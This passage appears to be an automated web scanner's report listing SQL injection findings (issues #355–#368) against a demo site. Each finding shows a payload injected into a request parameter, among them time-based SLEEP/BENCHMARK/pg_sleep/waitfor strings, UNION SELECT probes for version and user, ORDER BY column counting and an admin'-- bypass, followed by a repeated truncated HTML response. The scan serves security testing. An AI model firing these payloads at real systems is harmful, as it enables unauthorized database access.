href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #355\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #356\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #357\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #358Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #359\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #360\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #361\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #362\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #363\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #364\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #365\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io`\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #366\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #367\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #368\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 